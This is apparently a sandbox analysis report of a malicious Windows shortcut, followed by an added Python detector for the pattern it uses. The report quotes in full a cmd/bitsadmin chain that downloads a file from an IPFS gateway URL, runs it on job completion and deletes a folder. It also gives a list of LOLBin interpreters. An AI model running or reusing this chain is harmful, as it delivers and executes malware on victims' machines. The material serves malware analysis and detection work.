Analysis

  • max time kernel
    118s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240419-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240419-en, locale:en-us, os:windows7-x64, system
  • submitted
    23/05/2024, 09:55

General

  • Target

    fb922c41d0db830efa2e420e37ec5aa0_NeikiAnalytics.lnk

  • Size

    4KB

  • MD5

    fb922c41d0db830efa2e420e37ec5aa0

  • SHA1

    450a7921db348d9731b1e34c31e04f140ace36f4

  • SHA256

    49d2124dfc3dca1c6a982ec8d2ff4a5d2c61a9a245f6f4c55ae087a7408445c9

  • SHA512

    5c7935f6b65b68c47f65b14d12252b49ce794274134c3c377fd9cf7fa2cbeb98eee582bd6078c9468609b45e65a054f4b093bc782d1ec816960e234c8d564c13

  • SSDEEP

    48:8w/xDdYAhvw7QSZQ+NIlZAsQ0fZncRrLZSZoab6Nv:8wZDzokyVrZ0fu9ZSiH

Score
6/10

Malware Config

Signatures

  • Legitimate hosting services abused for malware hosting/C2 (1 TTP, 2 IoCs)

    The payload is fetched from a public IPFS gateway (cloudflare-ipfs.com), so the download goes to a legitimate, widely allow-listed domain.

  • Enumerates physical storage devices (1 TTP)

    Attempts to interact with connected storage/optical drive(s).

  • Download via BitsAdmin (1 TTP, 1 IoC)

    bitsadmin /addfile registers a remote URL for the BITS service to download; the same job is given a /setnotifycmdline completion command that launches cmd.exe, so the transfer and the execution of the downloaded file are both performed by BITS rather than by the parent cmd.exe.

  • Suspicious use of WriteProcessMemory (24 IoCs)

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\fb922c41d0db830efa2e420e37ec5aa0_NeikiAnalytics.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1008
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c "bitsadmin /reset&bitsadmin /create ""&bitsadmin /addfile "" "https://cloudflare-ipfs.com/ipfs/bafybeigazjlfqpg24molg3u7joq3fsyrgdk7bctuirjrojt5wbx6o4o2da?www=" "C:\Users\Admin\AppData\Local\Temp\tmpfile.html"&bitsadmin /setproxysettings "" NO_PROXY&bitsadmin /setnotifyflags "" 1&bitsadmin /setnotifycmdline "" "C:\Windows\system32\cmd.exe" "/c bitsadmin /complete \"\"&start \"\" \"C:\Users\Admin\AppData\Local\Temp\tmpfile.html\""&bitsadmin /resume ""&if "%cd%"=="%cd:system32=%" (rd /s /q "%cd%\dir1\dir2")"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:2740
      • C:\Windows\system32\bitsadmin.exe
        bitsadmin /reset
        3⤵
        PID:2176
      • C:\Windows\system32\bitsadmin.exe
        bitsadmin /create ""
        3⤵
        PID:2736
      • C:\Windows\system32\bitsadmin.exe
        bitsadmin /addfile "" "https://cloudflare-ipfs.com/ipfs/bafybeigazjlfqpg24molg3u7joq3fsyrgdk7bctuirjrojt5wbx6o4o2da?www=" "C:\Users\Admin\AppData\Local\Temp\tmpfile.html"
        3⤵
        • Download via BitsAdmin
        PID:2828
      • C:\Windows\system32\bitsadmin.exe
        bitsadmin /setproxysettings "" NO_PROXY
        3⤵
        PID:2512
      • C:\Windows\system32\bitsadmin.exe
        bitsadmin /setnotifyflags "" 1
        3⤵
        PID:2480
      • C:\Windows\system32\bitsadmin.exe
        bitsadmin /setnotifycmdline "" "C:\Windows\system32\cmd.exe" "/c bitsadmin /complete \"\"&start \"\" \"C:\Users\Admin\AppData\Local\Temp\tmpfile.html\""
        3⤵
        PID:2380
      • C:\Windows\system32\bitsadmin.exe
        bitsadmin /resume ""
        3⤵
        PID:2288
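The cmd.exe line in PID 2740 is the whole attack: one command chain creates a BITS job with an empty name, adds a remote URL, disables the proxy, registers cmd.exe as the job's completion command (so BITS, not the parent cmd.exe, launches the downloaded tmpfile.html), and resumes the job. The inner "&" of the /setnotifycmdline argument is protected only by cmd.exe's quote toggling, which is what lets it survive into the job instead of ending the segment. The script below is an added example, not part of the sandbox report or of the sandbox's own signature logic: it parses a process-creation command line (Sysmon event 1 or Security 4688 style) the way cmd.exe would, summarises each bitsadmin verb, and gives a verdict. The report's own cmd.exe line is embedded verbatim; the two benign comparison lines, the helper names and the NOTIFY_LOLBINS list are the editor's constructions.

```python
import ntpath
import re

# Programs that, if registered as a BITS job's notify command line, mean job
# completion launches an interpreter/LOLBin rather than an updater (assumed list).
NOTIFY_LOLBINS = {"cmd.exe", "powershell.exe", "pwsh.exe", "mshta.exe", "rundll32.exe",
                  "regsvr32.exe", "wscript.exe", "cscript.exe"}

# Matches '[path\]cmd[.exe] /c|/k <body>' and captures <body>.
_CMD_WRAPPER = re.compile(r'(?i)^\s*"?(?:[^"\s]*[\\/])?cmd(?:\.exe)?"?\s+/[ck]\s*(.*)$', re.S)


def cmd_body(cmdline):
    """Return what cmd.exe executes for 'cmd /c <body>': one pair of enclosing
    quotes is stripped, as cmd.exe does. Lines that are not a cmd wrapper pass through."""
    m = _CMD_WRAPPER.match(cmdline)
    if not m:
        return cmdline.strip()
    body = m.group(1).strip()
    if len(body) >= 2 and body[0] == '"' and body[-1] == '"':
        body = body[1:-1]
    return body


def split_chain(body):
    """Split on '&' / '&&' outside double quotes. cmd.exe has no escape character:
    a backslash before a quote does not protect it, the quote still toggles state."""
    parts, buf, quoted, i = [], [], False, 0
    while i < len(body):
        ch = body[i]
        if ch == '"':
            quoted = not quoted
            buf.append(ch)
        elif ch == "&" and not quoted:
            parts.append("".join(buf).strip())
            buf = []
            if body[i + 1:i + 2] == "&":   # treat '&&' as one separator
                i += 1
        else:
            buf.append(ch)
        i += 1
    parts.append("".join(buf).strip())
    return [p for p in parts if p]


def tokens(segment):
    """Whitespace-split honouring double quotes; an explicit "" yields an empty
    token so the empty job name used in the report is kept as a value."""
    out, buf, quoted, seen_quote = [], [], False, False
    for ch in segment:
        if ch == '"':
            quoted, seen_quote = not quoted, True
        elif ch.isspace() and not quoted:
            if buf or seen_quote:
                out.append("".join(buf))
            buf, seen_quote = [], False
        else:
            buf.append(ch)
    if buf or seen_quote:
        out.append("".join(buf))
    return out


def analyze_chain(cmdline):
    """Summarise every bitsadmin invocation in a cmd chain and return a verdict."""
    segs = split_chain(cmd_body(cmdline))
    info = {"segments": len(segs), "verbs": [], "jobs": set(), "downloads": [],
            "notify": [], "resumed": False, "proxy_bypass": False}
    for seg in segs:
        t = tokens(seg)
        if len(t) < 2 or ntpath.basename(t[0]).lower() not in ("bitsadmin", "bitsadmin.exe"):
            continue
        verb = t[1].lower()
        info["verbs"].append(verb)
        if verb == "/create" and len(t) > 2:
            info["jobs"].add(t[-1])                    # job name, possibly ""
        elif verb == "/addfile" and len(t) >= 5:
            info["downloads"].append((t[3], t[4]))     # (remote URL, local path)
        elif verb == "/transfer" and len(t) >= 4:
            info["downloads"].append((t[-2], t[-1]))
        elif verb == "/setnotifycmdline" and len(t) >= 4:
            info["notify"].append((t[3], t[4] if len(t) > 4 else ""))
        elif verb == "/setproxysettings" and "no_proxy" in seg.lower():
            info["proxy_bypass"] = True
        elif verb == "/resume":
            info["resumed"] = True
    info["remote_urls"] = [u for u, _ in info["downloads"] if re.match(r"(?i)^https?://", u)]
    info["notify_lolbins"] = [p for p, _ in info["notify"]
                              if ntpath.basename(p).lower() in NOTIFY_LOLBINS]
    if info["remote_urls"] and info["notify_lolbins"]:
        info["verdict"] = "bits_download_execute"
    elif info["remote_urls"]:
        info["verdict"] = "bits_download"
    else:
        info["verdict"] = "benign"
    return info


# Child cmd.exe command line exactly as recorded in the report above (PID 2740).
REPORT_CMDLINE = r'"C:\Windows\System32\cmd.exe" /c "bitsadmin /reset&bitsadmin /create ""&bitsadmin /addfile "" "https://cloudflare-ipfs.com/ipfs/bafybeigazjlfqpg24molg3u7joq3fsyrgdk7bctuirjrojt5wbx6o4o2da?www=" "C:\Users\Admin\AppData\Local\Temp\tmpfile.html"&bitsadmin /setproxysettings "" NO_PROXY&bitsadmin /setnotifyflags "" 1&bitsadmin /setnotifycmdline "" "C:\Windows\system32\cmd.exe" "/c bitsadmin /complete \"\"&start \"\" \"C:\Users\Admin\AppData\Local\Temp\tmpfile.html\""&bitsadmin /resume ""&if "%cd%"=="%cd:system32=%" (rd /s /q "%cd%\dir1\dir2")"'

# Constructed benign comparison lines (not from the report).
BENIGN_TRANSFER = r'bitsadmin /transfer updatejob /download /priority normal https://example.invalid/update.cab C:\temp\update.cab'
BENIGN_LIST = 'cmd /c bitsadmin /list /allusers'

if __name__ == "__main__":
    for line in (REPORT_CMDLINE, BENIGN_TRANSFER, BENIGN_LIST):
        r = analyze_chain(line)
        print(r["verdict"], r["verbs"], r["remote_urls"], r["notify_lolbins"])
```

The verdict keys on the combination, not on bitsadmin alone: a plain /transfer of a remote file is common in legitimate updaters and only rates "bits_download", while a remote /addfile paired with a /setnotifycmdline that names an interpreter is the download-and-execute pattern from this report. The empty job name, the NO_PROXY setting and the final /resume are kept in the summary because each is a useful secondary indicator when the URL itself is a benign-looking gateway.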

              Network

              MITRE ATT&CK Enterprise v15
